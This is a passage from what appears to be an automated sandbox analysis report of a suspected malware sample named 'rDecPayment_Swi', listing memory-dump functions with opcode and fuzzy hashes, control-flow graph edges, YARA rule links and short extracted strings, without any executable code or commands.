                                            • Instruction ID: eb8a745a909c9457ee0fc78d46458cfdc05879374a0ee09e029d6a19cf2827f5
                                            • Opcode Fuzzy Hash: d5fad246d490bd09725ba7936bd01cd9f40e89cc2d53e8fe3b922140194eb1cd
                                            • Instruction Fuzzy Hash: 41C13170E50218CFEB94CFA9D889B9EBBF2FB9A300F10916AD109A7745DB345985CF50
                                            Function 060F5958 Relevance: .3, Instructions: 278COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 28396af5269ca1adbf2ddfd05f1c7cda3291299421e13ee3ad41834ff28cd3af
                                            • Instruction ID: 3f8f4c37a1d8166990808f7a65cd59da580a64cab38d135c6103431f02f7adcc
                                            • Opcode Fuzzy Hash: 28396af5269ca1adbf2ddfd05f1c7cda3291299421e13ee3ad41834ff28cd3af
                                            • Instruction Fuzzy Hash: 28C12070E50228CFEB94CFA9D885B9EBBF2FB9A300F10916AD509A7745DB345985CF40
                                            Function 060F61F2 Relevance: .2, Instructions: 204COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7697253d6f3adf605cfbd5dc9dd214e8411767341de6303ba5bd21357d8c57f1
                                            • Instruction ID: 356433605e7a11138d5d6c930fab7ea915733b0e8916d4ad79d2f9f84b69218b
                                            • Opcode Fuzzy Hash: 7697253d6f3adf605cfbd5dc9dd214e8411767341de6303ba5bd21357d8c57f1
                                            • Instruction Fuzzy Hash: 29912670E60218CFDB94DFA9D94479EBBF2FB49300F208129D519A7295DB365D85CF40
                                            Function 060F6200 Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335730568.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60f0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46862e0a2eae067fa53e425d22ebc30c8ca6ae3bc3b702f31c5c91484f740194
                                            • Instruction ID: 270e3b51a10d3c09d06f6cec4100fad9853d01ecc17765c929bf3c1b22058fb5
                                            • Opcode Fuzzy Hash: 46862e0a2eae067fa53e425d22ebc30c8ca6ae3bc3b702f31c5c91484f740194
                                            • Instruction Fuzzy Hash: BB914570E60218CFEB94DFA9D9847ADBBF2BB89300F208129D508A7295DB365D85CF40
                                            Function 06151242 Relevance: .2, Instructions: 181COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 23d0fdb9df4cc6b19d2fe3bb51ce93a84f91d0ef939050e2471121f85ea9bee0
                                            • Instruction ID: a432bd54068f2abd440f7e70aed34f346b1e77b58960aaa15be347d63c397084
                                            • Opcode Fuzzy Hash: 23d0fdb9df4cc6b19d2fe3bb51ce93a84f91d0ef939050e2471121f85ea9bee0
                                            • Instruction Fuzzy Hash: E27118B4E01208DFDB44DFA9D581AAEBBF6FF89300F118429E819AB394DB349945CF50
                                            Function 060DBB60 Relevance: .2, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a1a7ba44225d6d2f61dbfe44545520214a2503b5cf4a8e673a1ffe94c06ba1b2
                                            • Instruction ID: 9c4721f2743802c25a7ba84cc475784cda426cec23ad7586311431840b47a0d1
                                            • Opcode Fuzzy Hash: a1a7ba44225d6d2f61dbfe44545520214a2503b5cf4a8e673a1ffe94c06ba1b2
                                            • Instruction Fuzzy Hash: 867119B4E44258CFEB54CFAAC8407AEBBF2BF89300F15D5AAD449AB244DB744985CF41
                                            Function 06151250 Relevance: .2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335846710.0000000006150000.00000040.00000800.00020000.00000000.sdmp, Offset: 06150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_6150000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: beb85ffc1ff2a4ab6a523d6b65e504513f531f6ed24e2f46e615d8bf8f074798
                                            • Instruction ID: c997df4b242b9098e141f924a725d0a106639a7ef927b6f704f8db4faf9e7659
                                            • Opcode Fuzzy Hash: beb85ffc1ff2a4ab6a523d6b65e504513f531f6ed24e2f46e615d8bf8f074798
                                            • Instruction Fuzzy Hash: D8711874E01208DFDB44DFA9D581AAEBBF6FF89300F218429E819AB394DB349945CF50
                                            Function 060DBB50 Relevance: .2, Instructions: 176COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2335641417.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_60d0000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 80737c3130860203f5c988546f5704fb933887c9d7964c87e0b867792bb4e336
                                            • Instruction ID: c27afe39adf88fc80931b9f6d33991b21b6c081464c57e6801bb01c426a5d520
                                            • Opcode Fuzzy Hash: 80737c3130860203f5c988546f5704fb933887c9d7964c87e0b867792bb4e336
                                            • Instruction Fuzzy Hash: C67119B4E44258CFEB64CFAAC84079EBBF2BF89300F14D5AAD449AB244DB744985CF41
                                            Function 05E3AE70 Relevance: 7.9, Strings: 6, Instructions: 403COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 628 5e3ae70-5e3aebc 632 5e3aec2-5e3aed4 628->632 633 5e3b03a-5e3b0a6 628->633 636 5e3aed6-5e3af22 632->636 637 5e3af24-5e3af6d 632->637 645 5e3b2f5-5e3b2fc 633->645 646 5e3b0ac-5e3b0b5 633->646 669 5e3af70-5e3afb0 636->669 637->669 649 5e3b0b7-5e3b0bb 646->649 650 5e3b12b-5e3b144 646->650 651 5e3b0d4-5e3b0e0 649->651 652 5e3b0bd-5e3b0d2 649->652 661 5e3b271-5e3b281 650->661 662 5e3b14a 650->662 655 5e3b0e9-5e3b126 651->655 652->655 655->645 671 5e3b283-5e3b298 661->671 672 5e3b29a-5e3b2a6 661->672 665 5e3b151-5e3b194 662->665 666 5e3b1e1-5e3b224 662->666 667 5e3b199-5e3b1dc 662->667 668 5e3b229-5e3b26c 662->668 665->645 666->645 667->645 668->645 683 5e3afb2-5e3afb8 669->683 684 5e3afba-5e3afc4 669->684 678 5e3b2af-5e3b2f0 671->678 672->678 678->645 685 5e3afc7-5e3afe0 683->685 684->685 688 5e3afe7-5e3b00a 685->688 692 5e3b030-5e3b037 688->692 693 5e3b00c-5e3b028 688->693 693->692
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (aq$4']q$4']q$4']q$4']q$paq
                                            • API String ID: 0-463314800
                                            • Opcode ID: 12d1017bf166366e2c497bac98d6016a9526e490ba02751fb1b607ac7fa04b65
                                            • Instruction ID: 1a63158eb1082a5871585f928e32b3f25623056a84d77391ec63191e26b3a52c
                                            • Opcode Fuzzy Hash: 12d1017bf166366e2c497bac98d6016a9526e490ba02751fb1b607ac7fa04b65
                                            • Instruction Fuzzy Hash: AAD18D32A00114DFCB09DF58C944E9A7BB7FF88310F0585A8E50AAB236DB35ED55DB50
                                            Function 05E39BB0 Relevance: 4.2, Strings: 3, Instructions: 478COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 929 5e39bb0-5e39bd8 931 5e39c26-5e39c34 929->931 932 5e39bda-5e39c21 929->932 933 5e39c43 931->933 934 5e39c36-5e39c41 call 5e376d0 931->934 980 5e3a07d-5e3a084 932->980 936 5e39c45-5e39c4c 933->936 934->936 939 5e39c52-5e39c56 936->939 940 5e39d35-5e39d39 936->940 941 5e3a085-5e3a0ad 939->941 942 5e39c5c-5e39c60 939->942 944 5e39d3b-5e39d4a call 5e358f8 940->944 945 5e39d8f-5e39d99 940->945 953 5e3a0b4-5e3a0de 941->953 947 5e39c72-5e39cd0 call 5e37410 call 5e37e78 942->947 948 5e39c62-5e39c6c 942->948 957 5e39d4e-5e39d53 944->957 949 5e39dd2-5e39df8 945->949 950 5e39d9b-5e39daa call 5e350a8 945->950 989 5e3a143-5e3a16d 947->989 990 5e39cd6-5e39d30 947->990 948->947 948->953 975 5e39e05 949->975 976 5e39dfa-5e39e03 949->976 966 5e39db0-5e39dcd 950->966 967 5e3a0e6-5e3a0fc 950->967 953->967 961 5e39d55-5e39d8a call 5e39678 957->961 962 5e39d4c 957->962 961->980 962->957 966->980 992 5e3a104-5e3a13c 967->992 982 5e39e07-5e39e2f 975->982 976->982 994 5e39f00-5e39f04 982->994 995 5e39e35-5e39e4e 982->995 999 5e3a177-5e3a17d 989->999 1000 5e3a16f-5e3a175 989->1000 990->980 992->989 1001 5e39f06-5e39f1f 994->1001 1002 5e39f7e-5e39f88 994->1002 995->994 1020 5e39e54-5e39e63 call 5e34ad0 995->1020 1000->999 1007 5e3a17e-5e3a1bb 1000->1007 1001->1002 1024 5e39f21-5e39f30 call 5e34ad0 1001->1024 1004 5e39fe5-5e39fee 1002->1004 1005 5e39f8a-5e39f94 1002->1005 1009 5e39ff0-5e3a01e call 5e36c20 call 5e36c40 1004->1009 1010 5e3a026-5e3a073 1004->1010 1021 5e39f96-5e39f98 1005->1021 1022 5e39f9a-5e39fac 1005->1022 1009->1010 1030 5e3a07b 1010->1030 1038 5e39e65-5e39e6b 1020->1038 1039 5e39e7b-5e39e90 1020->1039 1027 5e39fae-5e39fb0 1021->1027 1022->1027 1046 5e39f32-5e39f38 1024->1046 1047 5e39f48-5e39f53 1024->1047 1035 5e39fb2-5e39fb6 1027->1035 1036 5e39fde-5e39fe3 1027->1036 1030->980 1041 5e39fd4-5e39fd9 call 5e338d0 1035->1041 1042 5e39fb8-5e39fd1 1035->1042 1036->1004 1036->1005 1048 5e39e6f-5e39e71 1038->1048 1049 5e39e6d 1038->1049 1052 5e39e92-5e39ebe call 5e35d70 1039->1052 1053 5e39ec4-5e39ecd 1039->1053 1041->1036 1042->1041 1056 5e39f3a 1046->1056 1057 5e39f3c-5e39f3e 1046->1057 1047->989 1058 5e39f59-5e39f7c 1047->1058 1048->1039 1049->1039 1052->992 1052->1053 1053->989 1055 5e39ed3-5e39efa 1053->1055 1055->994 1055->1020 1056->1047 1057->1047 1058->1002 1058->1024
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq$Haq$Haq
                                            • API String ID: 0-3013282719
                                            • Opcode ID: 09911bfdac18eb91c78a20f569c07653dac5c2563aa372c4a92b0d980d482e42
                                            • Instruction ID: 8aff21c0f1a2b482765b7e694cfdbf420a08780dc2463ce5f220ff024c345381
                                            • Opcode Fuzzy Hash: 09911bfdac18eb91c78a20f569c07653dac5c2563aa372c4a92b0d980d482e42
                                            • Instruction Fuzzy Hash: 48124A71A00205CFDB24DFA9D889AAEBBF2FF88304F14852DE4469B355DB75E845CB50
                                            Function 05E3B868 Relevance: 4.1, Strings: 3, Instructions: 370COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1071 5e3b868-5e3b8a5 call 5e3bd88 1073 5e3b8c7-5e3b8dd call 5e3b670 1071->1073 1074 5e3b8a7-5e3b8ac call 5e3c1d8 1071->1074 1080 5e3bc53-5e3bc67 1073->1080 1081 5e3b8e3-5e3b8ef 1073->1081 1076 5e3b8b2-5e3b8b4 1074->1076 1076->1073 1078 5e3b8b6-5e3b8be 1076->1078 1078->1073 1092 5e3bca7-5e3bcb0 1080->1092 1082 5e3ba20-5e3ba27 1081->1082 1083 5e3b8f5-5e3b8f8 1081->1083 1085 5e3bb56-5e3bb93 call 5e3b078 call 5e3e010 1082->1085 1086 5e3ba2d-5e3ba36 1082->1086 1084 5e3b8fb-5e3b904 1083->1084 1089 5e3b90a-5e3b91e 1084->1089 1090 5e3bd48 1084->1090 1130 5e3bb99-5e3bc4a call 5e3b078 1085->1130 1086->1085 1091 5e3ba3c-5e3bb48 call 5e3b078 call 5e3b608 call 5e3b078 1086->1091 1106 5e3ba10-5e3ba1a 1089->1106 1107 5e3b924-5e3b9b9 call 5e3b670 * 2 call 5e3b078 call 5e3b608 call 5e3b6b0 call 5e3b758 call 5e3b7c0 1089->1107 1094 5e3bd4d-5e3bd51 1090->1094 1182 5e3bb53 1091->1182 1183 5e3bb4a 1091->1183 1095 5e3bcb2-5e3bcb9 1092->1095 1096 5e3bc75-5e3bc7e 1092->1096 1097 5e3bd53 1094->1097 1098 5e3bd5c 1094->1098 1102 5e3bd07-5e3bd0e 1095->1102 1103 5e3bcbb-5e3bcfe call 5e3b078 1095->1103 1096->1090 1100 5e3bc84-5e3bc96 1096->1100 1097->1098 1112 5e3bd5d 1098->1112 1117 5e3bca6 1100->1117 1118 5e3bc98-5e3bc9d 1100->1118 1108 5e3bd33-5e3bd46 1102->1108 1109 5e3bd10-5e3bd20 1102->1109 1103->1102 1106->1082 1106->1084 1163 5e3b9bb-5e3b9d3 call 5e3b758 call 5e3b078 call 5e3b328 1107->1163 1164 5e3b9d8-5e3ba0b call 5e3b7c0 1107->1164 1108->1094 1109->1108 1123 5e3bd22-5e3bd2a 1109->1123 1112->1112 1117->1092 1187 5e3bca0 call 5e3e7a0 1118->1187 1188 5e3bca0 call 5e3e7b0 1118->1188 1123->1108 1130->1080 1163->1164 1164->1106 1182->1085 1183->1182 1187->1117 1188->1117
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q$4']q$4']q
                                            • API String ID: 0-705557208
                                            • Opcode ID: b168ea59bfcb392ea0fdbdddecaebc0314e61f90200b6a7a12db520fb7e1915e
                                            • Instruction ID: d91d275cba8e80503e5b187681856a4b54c39c9034bb3c5bf703bc648575da51
                                            • Opcode Fuzzy Hash: b168ea59bfcb392ea0fdbdddecaebc0314e61f90200b6a7a12db520fb7e1915e
                                            • Instruction Fuzzy Hash: 6AF1C534B10218CFDB08DFA8D999A9DBBB6FF88300F518159E446AB365DB75EC42CB50
                                            Function 05D717D8 Relevance: 3.7, Strings: 2, Instructions: 1192COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334491048.0000000005D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5d70000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q$4']q
                                            • API String ID: 0-3120983240
                                            • Opcode ID: 2ae0824b85c8403a899eac8da8dd821cc24175472a31525566878ea2c850b3d9
                                            • Instruction ID: 1382396d67f74de15bd21dd4f4164041963444966e290109dbab6574a5bc5d60
                                            • Opcode Fuzzy Hash: 2ae0824b85c8403a899eac8da8dd821cc24175472a31525566878ea2c850b3d9
                                            • Instruction Fuzzy Hash: E3B27D74909389CFDB16CBA8C858BAE7FB2BF46301F14809BE541AB3A1D7749845CF61
                                            Function 05D729D0 Relevance: 2.9, Strings: 2, Instructions: 362COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1745 5d729d0-5d729f8 1746 5d729ff-5d72a28 1745->1746 1747 5d729fa 1745->1747 1748 5d72a2a-5d72a33 1746->1748 1749 5d72a49 1746->1749 1747->1746 1751 5d72a35-5d72a38 1748->1751 1752 5d72a3a-5d72a3d 1748->1752 1750 5d72a4c-5d72a50 1749->1750 1753 5d72e07-5d72e1e 1750->1753 1754 5d72a47 1751->1754 1752->1754 1756 5d72a55-5d72a59 1753->1756 1757 5d72e24-5d72e28 1753->1757 1754->1750 1758 5d72a5e-5d72a62 1756->1758 1759 5d72a5b-5d72ab8 1756->1759 1760 5d72e5d-5d72e61 1757->1760 1761 5d72e2a-5d72e5a 1757->1761 1763 5d72a64-5d72a88 1758->1763 1764 5d72a8b-5d72a8e 1758->1764 1768 5d72abd-5d72ac1 1759->1768 1769 5d72aba-5d72b2b 1759->1769 1765 5d72e63-5d72e6c 1760->1765 1766 5d72e82 1760->1766 1761->1760 1763->1764 1870 5d72a90 call 60d4a40 1764->1870 1871 5d72a90 call 60d4a50 1764->1871 1770 5d72e73-5d72e76 1765->1770 1771 5d72e6e-5d72e71 1765->1771 1772 5d72e85-5d72e8b 1766->1772 1774 5d72ac3-5d72ae7 1768->1774 1775 5d72aea-5d72b11 1768->1775 1780 5d72b30-5d72b34 1769->1780 1781 5d72b2d-5d72b8a 1769->1781 1777 5d72e80 1770->1777 1771->1777 1774->1775 1800 5d72b13-5d72b19 1775->1800 1801 5d72b21-5d72b22 1775->1801 1777->1772 1778 5d72a96-5d72aaf 1778->1753 1784 5d72b36-5d72b5a 1780->1784 1785 5d72b5d-5d72b81 1780->1785 1789 5d72b8f-5d72b93 1781->1789 1790 5d72b8c-5d72be8 1781->1790 1784->1785 1785->1753 1793 5d72b95-5d72bb9 1789->1793 1794 5d72bbc-5d72bbf 1789->1794 1802 5d72bed-5d72bf1 1790->1802 1803 5d72bea-5d72c4c 1790->1803 1793->1794 1811 5d72bc7-5d72bdf 1794->1811 1800->1801 1801->1753 1806 5d72bf3-5d72c17 1802->1806 1807 5d72c1a-5d72c32 1802->1807 1812 5d72c51-5d72c55 1803->1812 1813 5d72c4e-5d72cb0 1803->1813 1806->1807 1824 5d72c34-5d72c3a 1807->1824 1825 5d72c42-5d72c43 1807->1825 1811->1753 1816 5d72c57-5d72c7b 1812->1816 1817 5d72c7e-5d72c96 1812->1817 1822 5d72cb5-5d72cb9 1813->1822 1823 5d72cb2-5d72d14 1813->1823 1816->1817 1835 5d72ca6-5d72ca7 1817->1835 1836 5d72c98-5d72c9e 1817->1836 1827 5d72ce2-5d72cfa 1822->1827 1828 5d72cbb-5d72cdf 1822->1828 1833 5d72d16-5d72d78 1823->1833 1834 5d72d19-5d72d1d 1823->1834 1824->1825 1825->1753 1846 5d72cfc-5d72d02 1827->1846 1847 5d72d0a-5d72d0b 1827->1847 1828->1827 1844 5d72d7d-5d72d81 1833->1844 1845 5d72d7a-5d72dd3 1833->1845 1838 5d72d46-5d72d5e 1834->1838 1839 5d72d1f-5d72d43 1834->1839 1835->1753 1836->1835 1857 5d72d60-5d72d66 1838->1857 1858 5d72d6e-5d72d6f 1838->1858 1839->1838 1849 5d72d83-5d72da7 1844->1849 1850 5d72daa-5d72dcd 1844->1850 1855 5d72dd5-5d72df9 1845->1855 1856 5d72dfc-5d72dff 1845->1856 1846->1847 1847->1753 1849->1850 1850->1753 1855->1856 1856->1753 1857->1858 1858->1753 1870->1778 1871->1778
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334491048.0000000005D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5d70000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q$4']q
                                            • API String ID: 0-3120983240
                                            • Opcode ID: c4cec7a2d7f3567ab38640f0ed5750000bc3edd246b9ae4097568bf003835e9a
                                            • Instruction ID: 660ae372932b7fe4fbb2e95ce1af26753af883d75a48ac7657ffcc2e698910ff
                                            • Opcode Fuzzy Hash: c4cec7a2d7f3567ab38640f0ed5750000bc3edd246b9ae4097568bf003835e9a
                                            • Instruction Fuzzy Hash: 8AF1D238D01258DFDB24DFA8E8956ADBBB3FF49301F60812AE416A7351EB749981CF50
                                            Function 05D73968 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1872 5d73968-5d7398d 1873 5d73994-5d739b3 1872->1873 1874 5d7398f 1872->1874 1875 5d739b5-5d739be 1873->1875 1876 5d739d4 1873->1876 1874->1873 1878 5d739c5-5d739c8 1875->1878 1879 5d739c0-5d739c3 1875->1879 1877 5d739d7-5d739db 1876->1877 1881 5d73b96-5d73bad 1877->1881 1880 5d739d2 1878->1880 1879->1880 1880->1877 1883 5d73bb3-5d73bb7 1881->1883 1884 5d739e0-5d739e4 1881->1884 1885 5d73be0-5d73be4 1883->1885 1886 5d73bb9-5d73bdd 1883->1886 1887 5d739e6-5d73a41 1884->1887 1888 5d739e9-5d739ed 1884->1888 1890 5d73be6-5d73bef 1885->1890 1891 5d73c05 1885->1891 1886->1885 1895 5d73a46-5d73a4a 1887->1895 1896 5d73a43-5d73aa4 1887->1896 1892 5d73a16-5d73a38 1888->1892 1893 5d739ef-5d73a13 1888->1893 1897 5d73bf6-5d73bf9 1890->1897 1898 5d73bf1-5d73bf4 1890->1898 1899 5d73c08-5d73c0e 1891->1899 1892->1881 1893->1892 1902 5d73a73-5d73a8a 1895->1902 1903 5d73a4c-5d73a70 1895->1903 1907 5d73aa6-5d73b07 1896->1907 1908 5d73aa9-5d73aad 1896->1908 1904 5d73c03 1897->1904 1898->1904 1916 5d73a8c-5d73a92 1902->1916 1917 5d73a9a-5d73a9b 1902->1917 1903->1902 1904->1899 1918 5d73b0c-5d73b10 1907->1918 1919 5d73b09-5d73b62 1907->1919 1912 5d73ad6-5d73aed 1908->1912 1913 5d73aaf-5d73ad3 1908->1913 1928 5d73aef-5d73af5 1912->1928 1929 5d73afd-5d73afe 1912->1929 1913->1912 1916->1917 1917->1881 1923 5d73b12-5d73b36 1918->1923 1924 5d73b39-5d73b5c 1918->1924 1930 5d73b64-5d73b88 1919->1930 1931 5d73b8b-5d73b8e 1919->1931 1923->1924 1924->1881 1928->1929 1929->1881 1930->1931 1931->1881
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334491048.0000000005D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D70000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5d70000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4']q$4']q
                                            • API String ID: 0-3120983240
                                            • Opcode ID: 7220e160b3c7c57d6d277d3e2192a018985c74ce52c91316fa78cdf91d72170d
                                            • Instruction ID: f6c32985b167f8e5be57aa7b5e723bab609ab692d25795a9087bf3d0e087d07b
                                            • Opcode Fuzzy Hash: 7220e160b3c7c57d6d277d3e2192a018985c74ce52c91316fa78cdf91d72170d
                                            • Instruction Fuzzy Hash: 8B91EF34E04209CFCB18DFA9D895AEDBBB2BF89305F50842AD416B7360DB359941CF21
                                            Function 05E356E9 Relevance: 2.7, Strings: 2, Instructions: 176COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1943 5e356e9-5e3570a 1945 5e35710-5e35712 1943->1945 1946 5e357fe-5e35823 1943->1946 1947 5e3582a-5e3584e 1945->1947 1948 5e35718-5e35724 1945->1948 1946->1947 1960 5e35855-5e35879 1947->1960 1952 5e35726-5e35732 1948->1952 1953 5e35738-5e35748 1948->1953 1952->1953 1952->1960 1953->1960 1961 5e3574e-5e3575c 1953->1961 1965 5e35880-5e35905 call 5e32828 1960->1965 1964 5e35762-5e35767 1961->1964 1961->1965 2000 5e35769 call 5e356e9 1964->2000 2001 5e35769 call 5e358f8 1964->2001 1993 5e3590a-5e35918 call 5e34ad0 1965->1993 1968 5e3576f-5e357b8 1982 5e357db-5e357fb call 5e338d0 1968->1982 1983 5e357ba-5e357d3 1968->1983 1983->1982 1996 5e35930-5e35932 1993->1996 1997 5e3591a-5e35920 1993->1997 1998 5e35922 1997->1998 1999 5e35924-5e35926 1997->1999 1998->1996 1999->1996 2000->1968 2001->1968
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (aq$Haq
                                            • API String ID: 0-3785302501
                                            • Opcode ID: 1b1e631e31b41bdef0230d6d276ace8dbc0fffa1c0693a6a10dfa500ef33e0cf
                                            • Instruction ID: 4eec7edacbcdd16905a26e3d333f885afeaef1e569b7536c0e2615e57f4c89b8
                                            • Opcode Fuzzy Hash: 1b1e631e31b41bdef0230d6d276ace8dbc0fffa1c0693a6a10dfa500ef33e0cf
                                            • Instruction Fuzzy Hash: 66519C35700205CFE718AF29D899A6E7BB7FF89314B50486EE5469B3A0DE35DC02CB91
                                            Function 05E37CA0 Relevance: 2.6, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2164 5e37ca0-5e37cc8 2166 5e37db4-5e37dd9 2164->2166 2167 5e37cce-5e37cd2 2164->2167 2174 5e37de0-5e37e04 2166->2174 2168 5e37ce6-5e37cea 2167->2168 2169 5e37cd4-5e37ce0 2167->2169 2170 5e37cf0-5e37d07 2168->2170 2171 5e37e0b-5e37e30 2168->2171 2169->2168 2169->2174 2182 5e37d1b-5e37d1f 2170->2182 2183 5e37d09-5e37d15 2170->2183 2189 5e37e37-5e37e73 2171->2189 2174->2171 2184 5e37d21-5e37d3a 2182->2184 2185 5e37d4b-5e37d64 call 5e34a08 2182->2185 2183->2182 2183->2189 2184->2185 2197 5e37d3c-5e37d3f 2184->2197 2198 5e37d66-5e37d8a 2185->2198 2199 5e37d8d-5e37d8f 2185->2199 2203 5e37d48 2197->2203 2202 5e37d98-5e37db1 2199->2202 2203->2185
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2334741453.0000000005E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5e30000_rDecPayment_Swi.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (aq$(aq
                                            • API String ID: 0-3916115647
                                            • Opcode ID: e8b397ccc49dee1217547a638be43319a8cdb15e519380cfccb32e91941db72e
                                            • Instruction ID: 1e034dbaf18b4e5670f4ded4e847a1d03923eeec63a83972ca63a5a5d3d9c06a
                                            • Opcode Fuzzy Hash: e8b397ccc49dee1217547a638be43319a8cdb15e519380cfccb32e91941db72e
                                            • Instruction Fuzzy Hash: ED51C031300205CFEB159F29D899AAE3BA6FF85344F54816AE806CB395CF34DD42CB91
                                            Function 05E3AE60 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
